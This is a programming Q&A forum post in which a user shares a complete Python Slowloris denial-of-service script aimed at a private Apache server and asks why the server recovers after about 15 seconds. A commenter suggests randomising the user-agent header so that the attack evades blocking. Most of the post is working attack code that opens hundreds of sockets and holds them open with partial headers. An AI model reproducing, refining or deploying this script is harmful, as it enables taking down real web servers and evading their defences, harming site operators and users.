# Slow Lorris needs random headers?

Tags: python, ddos

I am trying to modify a slow lorris script for my studies, the existing script is nicely written and works quite well - initially

When the attack is first started, it causes the webserver to hang -*fantastic*

but after approximately 15 seconds the page becomes responsive again, as if the attack has been blocked

**Could this be because the attack uses the same header info each time and the webserver notices?**

--

The server has no security modules apart from whatever would of been included in a 3 year old apache install on ubuntu

```
    import socket, random, time, sys

headers = [
    "User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Accept-language: en-US,en"
]

sockets = []
ip = "192.168.0.40"

def setupSocket(ip):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(4)
    sock.connect((ip, 80))
    sock.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 1337)).encode("utf-8"))

    for header in headers:
        sock.send("{}\r\n".format(header).encode("utf-8"))

    return sock

if __name__ == "__main__":

    ip = "192.168.0.40"
    count = 350
    print("Starting DoS attack on {}. Connecting to {} sockets.".format(ip, count))

    for _ in range(count):
        try:
            print("Socket {}".format(_))
            sock = setupSocket(ip)
        except socket.error:
            break

        sockets.append(sock)

    while True:
        print("Connected to {} sockets. Sending headers...".format(len(sockets)))

        for sock in list(sockets):
            try:
                sock.send("X-a: {}\r\n".format(random.randint(1, 4600)).encode("utf-8"))
            except socket.error:
                sockets.remove(sock)

        for _ in range(count - len(sockets)):
            print("Re-opening closed sockets...")
            try:
                sock = setupSocket(ip)
                if sock:
                    sockets.append(sock)
            except socket.error:
                break

        time.sleep(15)
setupSocket(ip)
```

Comment: You can check if you are correct by adding a random salt to each Useragent.

Comment: Ill give that a go, thanks mate !

Comment: If it works, be sure to write out an answer to your own question (down below) so you can help others :) try to also add other info that could be useful, like the server type, if you know it.